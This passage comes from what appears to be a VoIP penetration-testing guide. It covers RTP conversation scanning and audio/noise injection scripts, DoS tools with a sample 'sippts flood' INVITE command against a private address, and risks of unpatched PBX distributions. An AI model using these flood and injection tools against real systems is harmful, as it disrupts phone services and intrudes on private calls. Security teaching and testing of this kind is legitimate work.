    678 Or you could use the scripts from [http://blog.pepelux.org/2011/09/13/inyectando-trafico-rtp-en-una-conversacion-voip/](http://blog.pepelux.org/2011/09/13/inyectando-trafico-rtp-en-una-conversacion-voip/) to **scan conversations** (**`rtpscan.pl`**), send a `.wav` to a conversation (**`rtpsend.pl`**) and **insert noise** in a conversation (**`rtpflood.pl`**).<sup>[[3]](#references)</sup>
    679 
    680 ### DoS
    681 
    682 There are several ways to try to achieve DoS in VoIP servers.
    683 
    684 - **`SIPPTS flood`** from [**sippts**](https://github.com/Pepelux/sippts)**: SIPPTS flood sends unlimited messages to the target.<sup>[[1]](#references)</sup>
    685   - `sippts flood -i 10.10.0.10 -m invite -v`
    686 - **`SIPPTS ping`** from [**sippts**](https://github.com/Pepelux/sippts)**: SIPPTS ping makes a SIP ping to see the server response time.
    687   - `sippts ping -i 10.10.0.10`
    688 - [**IAXFlooder**](https://www.kali.org/tools/iaxflood/): DoS IAX protocol used by Asterisk
    689 - [**inviteflood**](https://github.com/foreni-packages/inviteflood/blob/master/inviteflood/Readme.txt): A tool to perform SIP/SDP INVITE message flooding over UDP/IP.
    690 - [**rtpflood**](https://www.kali.org/tools/rtpflood/): Send several well-formed RTP packets. You need to identify the RTP ports in use first.
    691 - [**SIPp**](https://github.com/SIPp/sipp): Allows to analyze and generate SIP traffic. so it can be used to DoS also.
    692 - [**SIPsak**](https://github.com/nils-ohlmeier/sipsak): SIP swiss army knife. Can also be used to perform SIP attacks.
    693 - Fuzzers: [**protos-sip**](https://www.kali.org/tools/protos-sip/), [**voiper**](https://github.com/gremwell/voiper).
    694 
    695 ### OS Vulnerabilities
    696 
    697 The easiest way to install a software such as Asterisk is to download an **OS distribution** that has it already installed, such as: **FreePBX, Elastix, Trixbox**... The problem with those is that once it's working sysadmins might **not update them again** and **vulnerabilities** are going to be discovered with time.
    698 
    699 ## References
    700 
    701 - [1] [sippts wiki](https://github.com/Pepelux/sippts/wiki)
    702 - [2] [SIPVicious GitHub repository](https://github.com/EnableSecurity/sipvicious)
    703 - [3] [Pepelux's blog](http://blog.pepelux.org/)
    704 - [4] [RTP Bleed](https://www.rtpbleed.com/)
    705 - [5] [SIP Digest Leak vulnerability](https://resources.enablesecurity.com/resources/sipdigestleak-tut.pdf)
    706 - [6] [Practical VoIP Penetration Testing](https://medium.com/vartai-security/practical-voip-penetration-testing-a1791602e1b4)
    707 - [7] [IANA – Session Initiation Protocol (SIP) Parameters](https://www.iana.org/assignments/sip-parameters/sip-parameters.xhtml)
    708 - [8] [Asterisk Documentation – Configuring the deprecated `chan_sip` driver](https://docs.asterisk.org/Configuration/Channel-Drivers/SIP/Configuring-chan_sip/)